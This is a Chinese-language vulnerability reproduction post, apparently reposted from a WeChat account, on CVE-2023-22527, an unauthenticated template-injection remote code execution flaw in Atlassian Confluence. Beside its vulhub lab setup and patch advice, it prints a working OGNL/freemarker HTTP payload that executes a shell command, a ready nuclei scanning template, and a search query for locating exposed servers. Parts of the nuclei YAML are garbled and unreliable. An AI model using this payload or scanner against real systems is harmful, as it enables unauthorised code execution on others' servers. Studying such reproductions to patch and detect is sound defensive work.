免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
Atlassian Confluence 模板注入代码执行漏洞
02
—
漏洞影响
影响范围
Atlassian Confluence Data Center and Server 8.0.x
Atlassian Confluence Data Center and Server 8.1.x
Atlassian Confluence Data Center and Server 8.2.x
Atlassian Confluence Data Center and Server 8.3.x
Atlassian Confluence Data Center and Server 8.4.x
Atlassian Confluence Data Center and Server 8.5.0-8.5.3
安全版本
Atlassian Confluence Data Center and Server 8.5.4
Atlassian Confluence Data Center 8.6.0
Atlassian Confluence Data Center 8.7.1
03
—
漏洞描述
Atlassian Confluence 是由 Atlassian 开发的企业级协作软件。2024年1月16日,Atlassian 官方披露 CVE-2023-22527 Atlassian Confluence 模板注入代码执行漏洞。攻击者可在无需登录的情况下构造恶意请求导致远程代码执行。Atlassian 官方评级严重,外界尚未流传相关利用。请Atlassian Confluence客户尽快升级。
04
—
app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
互联网暴露面不算大,但内网中数量是相当可观的。
05
—
靶场搭建
下载vulhub源码
https://github.com/vulhub/vulhub
将源码上传到靶场虚拟机,解压并修改名称
unzip vulhub-master.zip
mv vulhub-master vulhub
然后进入漏洞对应目录
cd vulhub/confluence/CVE-2023-22527
启动容器
docker compose up -d
经过漫长的等待之后,安装完成查看容器,是有两个容器
访问
http://your-ip:8090
安装完之后需要按照提示申请一个license,按照安装向导配置数据库信息
06
—
漏洞复现
向靶场发送如下数据包
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
label=u0027%2b#requestu005bu0027.KEY_velocity.struts2.contextu0027u005d.internalGet(u0027ognlu0027).findValue(#parameters.x,{})%2bu0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
漏洞复现成功
07
—
nuclei poc
poc文件内容如下
id: CVE-2023-22527
info:
name: Atlassian Confluence 模板注入代码执行漏洞
author: fgz
severity: critical
description: Atlassian Confluence 是由 Atlassian 开发的企业级协作软件。2024年1月16日,Atlassian 官方披露 CVE-2023-22527 Atlassian Confluence 模板注入代码执行漏洞。攻击者可在无需登录的情况下构造恶意请求导致远程代码执行。Atlassian 官方评级严重,外界尚未流传相关利用。请Atlassian Confluence客户尽快升级。
metadata:
1 :
app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3" :
verified: true
requests:
raw:
|+
POST /template/aui/text-inline.vm HTTP/1.1
Host: {{Hostname}}
gzip, deflate, br :
Accept: */*
en-US;q=0.9,en;q=0.8 :
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 :
Connection: close
max-age=0 :
application/x-www-form-urlencoded :
285 :
label=u0027%2b#requestu005bu0027.KEY_velocity.struts2.contextu0027u005d.internalGet(u0027ognlu0027).findValue(#parameters.x,{})%2bu0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
matchers:
type: dsl
dsl:
"status_code == 200 && contains(header, 'X-Cmd-Response')"
运行POC
nuclei.exe -u http://192.168.40.130:8090/ -t mypoc/cve/CVE-2023-22527.yaml
08
—
修复建议
1、官方已经发布安全更新,建议升级至最新版本。
2、利用安全组功能设置其仅对可信地址开放。
09
—
原文始发于微信公众号(AI与网安):[漏洞复现]CVE-2023-22527
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论